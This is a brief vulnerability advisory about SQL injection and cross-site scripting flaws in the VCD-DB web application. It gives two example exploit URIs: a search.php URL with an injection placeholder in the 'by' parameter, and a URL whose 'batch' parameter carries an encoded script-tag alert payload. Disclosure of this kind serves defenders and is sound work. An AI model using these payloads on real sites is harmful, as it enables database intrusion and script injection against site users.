VCD-DB Multiple Input Validation Vulnerabilities

VCD-DB Multiple Input Validation Vulnerabilities

No exploit is required.

An example URI sufficient to exploit the SQL injection issue:
http://www.example.com/search.php?searchstring=&by=[SQL]

An example URI sufficient to exploit the cross-site scripting issue:
http://www.example.com/?page=category&category_id=1&viewmode=img&batch=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E